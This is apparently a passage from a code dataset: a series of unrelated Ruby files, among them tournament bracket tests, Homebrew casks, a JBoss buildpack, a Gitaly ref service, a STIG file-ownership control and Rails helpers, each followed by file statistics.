guy4 = get_wrestler_by_name("Test4")
guy5 = get_wrestler_by_name("Test5")
guy6 = get_wrestler_by_name("Test6")
guy7 = get_wrestler_by_name("Test7")
guy8 = get_wrestler_by_name("Test8")
assert guy1.pool == 1
assert guy2.pool == 2
assert guy3.pool == 2
assert guy4.pool == 1
end
test "Loser names set up correctly" do
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 1}.first.loser1_name == "Winner Pool 1"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 1}.first.loser2_name == "Runner Up Pool 2"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 2}.first.loser1_name == "Winner Pool 2"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 2}.first.loser2_name == "Runner Up Pool 1"
thirdFourth = @tournament.matches.reload.select{|m| m.bracket_position == "3/4"}.first
semis = @tournament.matches.reload.select{|m| m.bracket_position == "Semis"}
assert thirdFourth.loser1_name == "Loser of #{semis.select{|m| m.bracket_position_number == 1}.first.bout_number}"
assert thirdFourth.loser2_name == "Loser of #{semis.select{|m| m.bracket_position_number == 2}.first.bout_number}"
end
test "Each wrestler has two pool matches" do
@tournament.wrestlers.each do |wrestler|
assert wrestler.pool_matches.size == 3
end
end
test "Placement points are given when moving through bracket" do
match = @tournament.matches.select{|m| m.bracket_position == "Semis"}.first
wrestler = get_wrestler_by_name("Test1")
match.w1 = wrestler.id
match.save
assert wrestler.reload.placement_points == 4
end
test "Run through all matches works" do
    @tournament.matches.sort_by { |match| match.round }.each do |match|
match.winner_id = match.w1
match.save
end
end
end
| 43.234375 | 146 | 0.707626 |
bf459bdadc15fd755fad9308763195297ebf7444 | 293 | # Be sure to restart your server when you modify this file.
# Configure sensitive parameters which will be filtered from the log file.
Rails.application.config.filter_parameters += [
:passw, :secret, :token, :_key, :crypt, :salt, :certificate, :otp, :ssn, :password, :otp_attempt, :photo
]
| 41.857143 | 106 | 0.737201 |
ffaeef5b1b838540f13e45b2a9e664b10210b797 | 366 | cask 'obinslab-starter' do
version '1.0.10'
sha256 '5aa810df804d18ae4ecdf3a049596164d2af76f518b83476d943f4e186c8b4e2'
url "http://releases.obins.net/occ/darwin/x64/ObinslabStarter_#{version}_x64.dmg"
appcast 'http://en.obins.net/obinslab-starter'
name 'Obinslab Starter'
homepage 'http://en.obins.net/obinslab-starter'
app 'Obinslab Starter.app'
end
| 30.5 | 83 | 0.773224 |
38f2a9dc3380c2a906f9e957448f351bc753d8eb | 772 | cask "imgotv" do
version "6.4.6_1"
sha256 "af68f7ec41444eb274ce7bc4d8e2c6b39b36f2d20b8299d507b0a3cd41e1b967"
url "https://download.imgo.tv/app/mac/#{version}/mgtv-mango.dmg",
verified: "download.imgo.tv/"
name "芒果TV"
desc "Mango TV video app"
homepage "https://www.mgtv.com/app/"
livecheck do
url "https://pcconf.api.mgtv.com/getPcDownloadUrl?source=mango2"
strategy :header_match
regex(%r{/app/mac/(\d+(?:[._]\d+)+)/mgtv[._-]mango\.dmg}i)
end
depends_on macos: ">= :sierra"
app "芒果TV.app"
zap trash: [
"~/Library/Caches/com.mgtv.pcclientx",
"~/Library/Containers/com.mgtv.MGTV-macOS",
"~/Library/Preferences/com.mgtv.pcclientx.plist",
"~/Library/Saved Application State/com.mgtv.pcclientx.savedState",
]
end
| 27.571429 | 75 | 0.683938 |
26ef662cb53e1e5891a0ca28cc00febfe2b2da21 | 3,052 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/container'
require 'java_buildpack/util/java_main_utils'
module JavaBuildpack
module Container
# Encapsulates the detect, compile, and release functionality for applications running Spring Boot CLI
# applications.
class Jboss < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_tar
update_configuration
copy_application
copy_additional_libraries
create_dodeploy
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
@droplet.java_opts.add_system_property 'jboss.http.port', '$PORT'
[
@droplet.java_home.as_env_var,
@droplet.java_opts.as_env_var,
'exec',
"$PWD/#{(@droplet.sandbox + 'bin/standalone.sh').relative_path_from(@droplet.root)}",
'-b',
'0.0.0.0'
].compact.join(' ')
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
web_inf? && !JavaBuildpack::Util::JavaMainUtils.main_class(@application)
end
private
def copy_application
FileUtils.mkdir_p root
@application.root.children.each { |child| FileUtils.cp_r child, root }
end
def copy_additional_libraries
web_inf_lib = root + 'WEB-INF/lib'
@droplet.additional_libraries.each { |additional_library| FileUtils.cp_r additional_library, web_inf_lib }
end
def create_dodeploy
FileUtils.touch(webapps + 'ROOT.war.dodeploy')
end
def root
webapps + 'ROOT.war'
end
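      # Comment out JBoss's default welcome-content handler in standalone.xml so it does not
      # shadow the application deployed at the root context (ROOT.war).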
def update_configuration
standalone_config = @droplet.sandbox + 'standalone/configuration/standalone.xml'
modified = standalone_config.read
.gsub(%r{<location name="/" handler="welcome-content"/>},
'<!-- <location name="/" handler="welcome-content"/> -->')
standalone_config.open('w') { |f| f.write modified }
end
def webapps
@droplet.sandbox + 'standalone/deployments'
end
def web_inf?
(@application.root + 'WEB-INF').exist?
end
end
end
end
| 30.217822 | 114 | 0.662189 |
f71673f1c0676c3ae1df8939501d56d063c3bb16 | 136 | class FooController < ApplicationController
skip_before_filter :authenticate_user!
def index
render :nothing => true
end
end
| 17 | 43 | 0.772059 |
1c0bd8b4c599458d24a5f05a06a115d82f502653 | 274 | #!/usr/bin/env ruby
# -*- encoding: us-ascii -*-
# Determine file format (e.g. packed, unpacked, decoded) for any file
desc "type FILE", "Display the type of a file (e.g. frozen, huffman, etc.)"
def type(file)
check_for_unknown_options(file)
puts File.type(file)
end
| 24.909091 | 75 | 0.693431 |
f70e1c5af13e622ee513085b9ce3ab18981a1914 | 49 | # encoding: utf-8
require 'validation_reflection' | 24.5 | 31 | 0.816327 |
5d6c43b7d426c97b7577d987c7b65c6ae12a8dbe | 1,262 | class ProductsController < Spree::BaseController
resource_controller
helper :taxons
before_filter :load_data, :only => :show
actions :show, :index
index do
before do
@product_cols = 3
end
end
def change_image
@product = Product.available.find_by_param(params[:id])
img = Image.find(params[:image_id])
render :partial => 'image', :locals => {:image => img}
end
private
def load_data
return unless permalink = params[:taxon_path]
@taxon = Taxon.find_by_permalink(params[:taxon_path].join("/") + "/")
end
def collection
if params[:taxon]
@taxon = Taxon.find(params[:taxon])
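      # Limit the search to products assigned to the selected taxon or any of its descendants.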
@search = Product.active.scoped(:conditions =>
["products.id in (select product_id from products_taxons where taxon_id in (" +
@taxon.descendents.inject( @taxon.id.to_s) { |clause, t| clause += ', ' + t.id.to_s} + "))"
]).new_search(params[:search])
else
@search = Product.active.new_search(params[:search])
end
@search.per_page = Spree::Config[:products_per_page]
@search.include = :images
@product_cols = 3
@products ||= @search.all
end
end
| 28.044444 | 133 | 0.591918 |
4ab8ef24575a4d0cc822e88cab13761aee16fce3 | 407 | module MiddlewareDeploymentHelper::TextualSummary
#
# Groups
#
def textual_group_properties
%i(name nativeid)
end
def textual_group_relationships
# Order of items should be from parent to child
%i(ems middleware_server)
end
def textual_group_smart_management
%i(tags)
end
def textual_name
@record.name
end
def textual_nativeid
@record.nativeid
end
end
| 15.074074 | 51 | 0.722359 |
87eaad54e5eeb4cbfd32000be26eb2ab258432fe | 1,628 | control "VCST-67-000017" do
title "The Security Token Service directory tree must have permissions in an
\"out-of-the-box\" state."
desc "As a rule, accounts on a web server are to be kept to a minimum. Only
administrators, web managers, developers, auditors, and web authors require
accounts on the machine hosting the web server. The resources to which these
accounts have access must also be closely monitored and controlled. The
Security Token Service files must be adequately protected with correct
permissions as applied out of the box.
"
desc 'rationale', ''
desc 'check', "
At the command prompt, execute the following command:
# find /usr/lib/vmware-sso/vmware-sts/ -xdev -type f -a '(' -not -user root
-o -not -group root ')' -exec ls -ld {} \\;
If the command produces any output, this is a finding.
"
desc 'fix', "
At the command prompt, execute the following command:
# chown root:root <file_name>
Repeat the command for each file that was returned.
Note: Replace <file_name> for the name of the file that was returned.
"
impact 0.5
tag severity: 'medium'
tag gtitle: 'SRG-APP-000211-WSR-000030'
tag satisfies: ['SRG-APP-000211-WSR-000030', 'SRG-APP-000380-WSR-000072']
tag gid: 'V-239668'
tag rid: 'SV-239668r679076_rule'
tag stig_id: 'VCST-67-000017'
tag fix_id: 'F-42860r679075_fix'
tag cci: ['CCI-001082', 'CCI-001813']
tag nist: ['SC-2', 'CM-5 (1)']
describe command("find '#{input('rootPath')}' -xdev -type f -a \'(\' -not -user root -o -not -group root \')\' -exec ls -ld {} \;") do
its('stdout.strip') { should eq ''}
end
end | 37 | 136 | 0.688575 |
e9d55716c35dcd0b556bcbed6b2f2cf0d93be231 | 82 | module BusinessHelper
def format_id(string)
string.match(/\d/)
end
end | 11.714286 | 23 | 0.682927 |
21ffc9b0e48840c2b673014e5e093e96c1f6c973 | 1,408 | class ArticlesController < ApplicationController
before_action :find_article, only: [:show, :create_comment, :destroy]
before_action :set_cache_control_headers, only: [:index, :show]
before_action :set_private, only: [:create_comment, :create_article]
# Returns all Article objects, and sets a table_key of 'articles',
# and a record_key for each article object: "#{table_key}/#{article_id}"
def index
@articles = Article.all
set_surrogate_key_header 'articles', @articles.map(&:record_key)
end
# Sets a surrogate key for the current article.
#
# Example:
#
# Article[75]
# Surrogate-Key:articles/75
def show
set_surrogate_key_header @article.record_key
end
# Creates a new comment for current article
def create_comment
@article.create_random_comment
redirect_to article_path(@article)
end
# Creates a new article
def create_article
Article.create_random_article
redirect_to articles_url
end
# Deletes the current article.
def destroy
@article.destroy
redirect_to articles_path
end
private
def find_article
@article = Article.find(params[:id])
redirect_to articles_path unless @article
end
# Private: Sets Cache-Control headers to not store content
# Used for create methods.
def set_private
response.headers['Cache-Control'] = 'no-cache, no-store, max-age=0, must-revalidate'
end
end
| 26.074074 | 88 | 0.732244 |
62243ce3ace43fa081548a083d5c2879155cfbbf | 4,187 | module GitalyServer
class RefService < Gitaly::RefService::Service
include Utils
TAGS_PER_MESSAGE = 100
def create_branch(request, call)
bridge_exceptions do
begin
start_point = request.start_point
start_point = 'HEAD' if start_point.empty?
branch_name = request.name
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
rugged_ref = repo.rugged.branches.create(branch_name, start_point)
Gitaly::CreateBranchResponse.new(
status: :OK,
branch: Gitaly::Branch.new(
name: rugged_ref.name.b,
target_commit: gitaly_commit_from_rugged(rugged_ref.target)
)
)
rescue Rugged::ReferenceError => e
status = case e.to_s
when /'refs\/heads\/#{branch_name}' is not valid/
:ERR_INVALID
when /a reference with that name already exists/
:ERR_EXISTS
else
:ERR_INVALID_START_POINT
end
Gitaly::CreateBranchResponse.new(status: status)
end
end
end
def delete_branch(request, call)
bridge_exceptions do
begin
branch_name = request.name
raise GRPC::InvalidArgument.new("empty Name") if branch_name.empty?
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
repo.delete_branch(branch_name)
Gitaly::DeleteBranchResponse.new
rescue Gitlab::Git::Repository::DeleteBranchError => e
raise GRPC::Internal.new(e.to_s)
end
end
end
def find_branch(request, call)
bridge_exceptions do
branch_name = request.name
raise GRPC::InvalidArgument.new("empty Name") if branch_name.empty?
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
rugged_branch = repo.find_branch(branch_name)
gitaly_branch = Gitaly::Branch.new(
name: rugged_branch.name.b,
target_commit: gitaly_commit_from_rugged(rugged_branch.dereferenced_target.raw_commit)
) unless rugged_branch.nil?
Gitaly::FindBranchResponse.new(branch: gitaly_branch)
end
end
def find_all_tags(request, call)
bridge_exceptions do
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
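        # Yield tags in slices of TAGS_PER_MESSAGE, one FindAllTagsResponse per slice.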
Enumerator.new do |y|
repo.tags.each_slice(TAGS_PER_MESSAGE) do |gitlab_tags|
tags = gitlab_tags.map do |gitlab_tag|
rugged_commit = gitlab_tag.dereferenced_target&.raw_commit
gitaly_commit = gitaly_commit_from_rugged(rugged_commit) if rugged_commit
gitaly_tag_from_gitlab_tag(gitlab_tag, gitaly_commit)
end
y.yield Gitaly::FindAllTagsResponse.new(tags: tags)
end
end
end
end
def delete_refs(request, call)
bridge_exceptions do
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
begin
if request.refs.any?
repo.delete_refs(*request.refs)
else
repo.delete_all_refs_except(request.except_with_prefix)
end
Gitaly::DeleteRefsResponse.new
rescue Gitlab::Git::Repository::GitError => e
Gitaly::DeleteRefsResponse.new(git_error: e.message)
end
end
end
def get_tag_messages(request, call)
bridge_exceptions do
repository = Gitlab::Git::Repository.from_gitaly(request.repository, call)
Enumerator.new do |y|
request.tag_ids.each do |tag_id|
annotation = repository.rugged.rev_parse(tag_id)
next unless annotation
response = Gitaly::GetTagMessagesResponse.new(tag_id: tag_id)
io = StringIO.new(annotation.message)
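            # Emit the tag message in chunks; only the first response for a tag carries its tag_id.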
while chunk = io.read(Gitlab.config.git.max_commit_or_tag_message_size)
response.message = chunk
y.yield response
response = Gitaly::GetTagMessagesResponse.new
end
end
end
end
end
end
end
| 31.481203 | 96 | 0.620731 |
ed217fe1a558b5a2ba583e19b43d2693731139eb | 284 | module Pipedrive
class SearchResults < Base
def search(params = {})
make_api_call(:get, params.merge(entity_hard_path: 'searchResults'))
end
def field(params = {})
make_api_call(:get, params.merge(entity_hard_path: 'searchResults/field'))
end
end
end
| 23.666667 | 80 | 0.68662 |
2692a243b9cef3685d1883688b3afd67bd958cbe | 240 | class WebNotificationsChannel < ApplicationCable::Channel
def subscribed
stream_from "web_notifications_channel"
# stream_from "some_channel"
end
def unsubscribed
# Any cleanup needed when channel is unsubscribed
end
end
| 21.818182 | 57 | 0.783333 |
1a92e96c552df2b8b9f0c768e030becd2401a047 | 199 | class AddAdditionalMilesAndGeneratorHoursToCarts < ActiveRecord::Migration
def change
add_column :carts, :additional_miles, :integer
add_column :carts, :generator_hours, :integer
end
end
| 28.428571 | 74 | 0.79397 |
1d8e41a01ff186f063f44b3e702a6d7d505c7449 | 606 | Pod::Spec.new do |s|
s.name = "Floc-Commands"
s.version = "0.3.0"
s.summary = "A collection of commands with fluent API for Objective-C."
s.homepage = "https://github.com/sschmid/Floc-Commands"
s.screenshots = "http://sschmid.com/Dev/iOS/Libs/Floc-Commands/Floc-Commands-128.png"
s.license = "MIT"
s.author = { "Simon Schmid" => "[email protected]" }
s.source = { :git => "https://github.com/sschmid/Floc-Commands.git", :tag => "0.3.0" }
s.platform = :ios, '5.0'
s.source_files = "Floc-Commands/Classes/**/*.{h,m}"
s.requires_arc = true
end
| 43.285714 | 94 | 0.605611 |
391980d34000fa7982602c969afdb5190c3551bf | 4,258 | class CalendarDateSelect
FORMATS = {
:natural => {
:date => "%B %d, %Y",
:time => " %I:%M %p"
},
:hyphen_ampm => {
:date => "%Y-%m-%d",
:time => " %I:%M %p",
:javascript_include => "calendar_date_select_format_hyphen_ampm"
}
}
cattr_accessor :image
@@image = "calendar.gif"
cattr_reader :format
@@format = FORMATS[:natural]
class << self
def format=(format)
raise "CalendarDateSelect: Unrecognized format specification: #{format}" unless FORMATS.has_key?(format)
@@format = FORMATS[format]
end
def javascript_format_include
@@format[:javascript_include]
end
def date_format_string(time=false)
@@format[:date] + ( time ? @@format[:time] : "" )
end
end
module FormHelper
def calendar_date_select_tag( name, value = nil, options = {})
calendar_options = calendar_date_select_process_options(options)
value = (value.strftime(calendar_options[:format]) rescue value) if (value.respond_to?("strftime"))
calendar_options.delete(:format)
options[:id] ||= name
tag = calendar_options[:embedded] ?
hidden_field_tag(name, value, options) :
text_field_tag(name, value, options)
calendar_date_select_output(tag, calendar_options)
end
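    # Split the option hash into calendar-specific options (:time, :embedded, :buttons, :format,
    # :year_range and the callbacks), leaving the rest for the HTML tag; bare callback snippets
    # are wrapped in a JavaScript function.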
def calendar_date_select_process_options(options)
calendar_options = {}
callbacks = [:before_show, :before_close, :after_show, :after_close, :after_navigate]
for key in [:time, :embedded, :buttons, :format, :year_range] + callbacks
calendar_options[key] = options.delete(key) if options.has_key?(key)
end
# surround any callbacks with a function, if not already done so
for key in callbacks
calendar_options[key] = "function(param) { #{calendar_options[key]} }" unless calendar_options[key].include?("function") if calendar_options[key]
end
calendar_options[:year_range] ||= 10
calendar_options[:format] ||= CalendarDateSelect.date_format_string(calendar_options[:time])
calendar_options
end
def calendar_date_select(object, method, options={})
obj = instance_eval("@#{object}") || options[:object]
if !options.include?(:time) && obj.class.respond_to?("columns_hash")
column_type = (obj.class.columns_hash[method.to_s].type rescue nil)
options[:time] = true if column_type==:datetime
end
calendar_options = calendar_date_select_process_options(options)
value = obj.send(method).strftime(calendar_options[:format]) rescue obj.send("#{method}_before_type_cast")
calendar_options.delete(:format)
options = options.merge(:value => value)
tag = ActionView::Helpers::InstanceTag.new(object, method, self, nil, options.delete(:object))
calendar_date_select_output(
tag.to_input_field_tag(calendar_options[:embedded] ? "hidden" : "text", options),
calendar_options
)
end
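    # Renders either an embedded calendar (hidden field plus inline JavaScript) or a popup
    # calendar opened by clicking the icon appended after the text field.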
def calendar_date_select_output(input, calendar_options = {})
out = input
if calendar_options[:embedded]
uniq_id = "cds_placeholder_#{(rand*100000).to_i}"
# we need to be able to locate the target input element, so lets stick an invisible span tag here we can easily locate
out << content_tag(:span, nil, :style => "display: none; position: absolute;", :id => uniq_id)
out << javascript_tag("new CalendarDateSelect( $('#{uniq_id}').previous(), #{options_for_javascript(calendar_options)} ); ")
else
out << " "
out << image_tag(CalendarDateSelect.image,
:onclick => "new CalendarDateSelect( $(this).previous(), #{options_for_javascript(calendar_options)} );",
:style => 'border:0px; cursor:pointer;')
end
out
end
end
end
module ActionView
module Helpers
class FormBuilder
def calendar_date_select(method, options = {})
@template.calendar_date_select(@object_name, method, options.merge(:object => @object))
end
end
end
end
| 35.190083 | 154 | 0.62635 |
e8a5946ab8856920aa92eb6a5638c3ae9985ef7c | 1,183 | require "#{File.dirname(__FILE__)}/spec_helper"
describe 'Unifying a bound value' do
[nil, true, false,
:sym, "str", /regex/,
3, 2.0,
Object.new, Class.new.new,
[], {}].each do |type|
describe "for #{type.class} instances" do
it 'passes unification for an object of equal value' do
local do |var, var2|
unify var, type
var.should == type
type.should == var
lambda {unify var, type}.should_not raise_error
unify var2, type
var.should == var2
var2.should == var
lambda {unify var, var2}.should_not raise_error
end
end
it 'fails unification for an object of inequal value' do
different = Object.new
local do |var, var2|
unify var, type
var.should_not == different
different.should_not == var
lambda {unify var, different}.should raise_error(Dataflow::UnificationError)
unify var2, different
var.should_not == var2
var2.should_not == var
lambda {unify var, different}.should raise_error(Dataflow::UnificationError)
end
end
end
end
end
| 28.853659 | 86 | 0.591716 |
4ac9017ec04a78bffd0d6e04b838c3ab5ab7c450 | 452 | # frozen_string_literal: true
module InterviewsHelper
ICON = { talk: { icon: 'fa-comments bg-yellow', title: I18n.t('activerecord.attributes.interview.type_ofs.talk') },
technical: { icon: 'fa-wrench bg-aqua', title: I18n.t('activerecord.attributes.interview.type_ofs.technical') } }.freeze
def interview_icon(enum_type)
tag.i class: "fa #{ICON[enum_type.to_s.to_sym][:icon]}", title: ICON[enum_type.to_s.to_sym][:title]
end
end
| 41.090909 | 131 | 0.716814 |
1dcd41fd2d70618eea7ad2f7b6fa374dda4e113e | 1,785 | #
# Author:: Tim Smith (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
require "support/shared/unit/resource/static_provider_resolution"
describe Chef::Resource::ZypperPackage, "initialize" do
static_provider_resolution(
resource: Chef::Resource::ZypperPackage,
provider: Chef::Provider::Package::Zypper,
name: :zypper_package,
action: :install,
os: "linux",
platform_family: "suse"
)
end
describe Chef::Resource::ZypperPackage, "defaults" do
let(:resource) { Chef::Resource::ZypperPackage.new("fakey_fakerton") }
it "sets the default action as :install" do
expect(resource.action).to eql([:install])
end
it "supports :install, :lock, :purge, :reconfig, :remove, :unlock, :upgrade actions" do
expect { resource.action :install }.not_to raise_error
expect { resource.action :lock }.not_to raise_error
expect { resource.action :purge }.not_to raise_error
expect { resource.action :reconfig }.not_to raise_error
expect { resource.action :remove }.not_to raise_error
expect { resource.action :unlock }.not_to raise_error
expect { resource.action :upgrade }.not_to raise_error
end
end
| 34.326923 | 89 | 0.735014 |
38d6762b0398bde3aa301d5317f4d229cf59f1fc | 4,268 | # frozen_string_literal: true
require 'spec_helper'
describe 'memberships' do
let!(:client) { create_client }
let!(:user) { client.users.create!(email: mock_email, name: mock_uuid, verified: true) }
let(:organization) { client.organizations.create!(name: mock_uuid) }
include_examples 'zendesk#resource',
create_params: lambda {
{
organization_id: client.organizations.create!(name: mock_uuid).identity,
user_id: user.id,
}
},
collection: -> { client.memberships(user: user) },
paged: true,
update: false,
search: false
it 'should be marked as default' do
membership = client.memberships.create!(organization: organization, user: user).reload
another_organization = client.organizations.create!(name: mock_uuid)
another_membership = client.memberships.create!(organization: another_organization, user: user).reload
expect(membership.default).to eq(true)
expect(another_membership.default).to eq(false)
expect do
another_membership.default!
end.to change {
another_membership.reload.default
}.from(false).to(true)
expect(membership.reload.default).to be_falsey
end
it "should get an organization's memberships" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(organization.memberships.size).to eq(1)
expect(another_organization.memberships.size).to eq(2)
end
it "should get an user's memberships" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
user_membership = another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(user.memberships.to_a).to eq([user_membership])
expect(another_user.memberships.size).to eq(2)
end
it "should get a user's organizations" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(user.organizations.to_a).to contain_exactly(another_organization)
expect(another_organization.users.to_a).to contain_exactly(user, another_user)
expect(organization.users.to_a).to contain_exactly(another_user)
end
describe 'create_membership' do
it 'should error when organization does not exist' do
expect do
client.create_membership('membership' => { 'user_id' => user.identity, 'organization_id' => 99 })
end.to raise_exception(Zendesk2::Error, /RecordInvalid/)
end
it 'should error when creating a duplicate membership' do
client.create_membership('membership' => {
'user_id' => user.identity,
'organization_id' => organization.identity,
})
expect do
client.create_membership('membership' => {
'user_id' => user.identity,
'organization_id' => organization.identity,
})
end.to raise_exception(Zendesk2::Error, /RecordInvalid/)
end
it 'should error when user does not exist' do
expect do
client.create_membership('membership' => { 'user_id' => 99, 'organization_id' => organization.identity })
end.to raise_exception(Zendesk2::Error, /RecordNotFound/)
end
end
end
| 41.038462 | 113 | 0.651359 |
ab841f9beed5dd6f5adb1ec95b13ace4f4eaaaa6 | 1,470 | require 'date'
require 'safe_yaml/load'
SafeYAML::OPTIONS[:suppress_warnings] = true
module Twine
class Plugin
attr_reader :debug, :config
def initialize
@debug = false
require_gems
end
###
# require gems from the yaml config.
#
# gems: [twine-plugin1, twine-2]
#
# also works with single gem
#
# gems: twine-plugin1
#
def require_gems
# ./twine.yml # current working directory
# ~/.twine # home directory
# /etc/twine.yml # etc
cwd_config = join_path Dir.pwd, 'twine.yml'
home_config = join_path Dir.home, '.twine'
etc_config = '/etc/twine.yml'
config_order = [cwd_config, home_config, etc_config]
puts "Config order: #{config_order}" if debug
config_order.each do |config_file|
next unless valid_file config_file
puts "Loading: #{config_file}" if debug
@config = SafeYAML.load_file config_file
puts "Config yaml: #{config}" if debug
break
end
return unless config
# wrap gems in an array. if nil then array will be empty
Kernel.Array(config['gems']).each do |gem_path|
puts "Requiring: #{gem_path}" if debug
require gem_path
end
end
private
def valid_file path
File.exist?(path) && File.readable?(path) && !File.directory?(path)
end
def join_path *paths
File.expand_path File.join(*paths)
end
end
end
| 22.96875 | 73 | 0.617007 |
1d554a9563939f413c526529a366627af19a3b81 | 1,052 | require "spec_helper"
describe "bundle update" do
describe "git sources" do
before :each do
build_repo2
@git = build_git "foo", :path => lib_path("foo") do |s|
s.executables = "foobar"
end
install_gemfile <<-G
source "file://#{gem_repo2}"
git "#{lib_path('foo')}"
gem 'foo'
gem 'rack'
G
end
it "updates the source" do
update_git "foo", :path => @git.path
bundle "update --source foo"
in_app_root do
run <<-RUBY
require 'foo'
puts "WIN" if defined?(FOO_PREV_REF)
RUBY
out.should == "WIN"
end
end
it "unlocks gems that were originally pulled in by the source" do
update_git "foo", "2.0", :path => @git.path
bundle "update --source foo"
should_be_installed "foo 2.0"
end
it "leaves all other gems frozen" do
update_repo2
update_git "foo", :path => @git.path
bundle "update --source foo"
should_be_installed "rack 1.0"
end
end
end | 21.469388 | 69 | 0.563688 |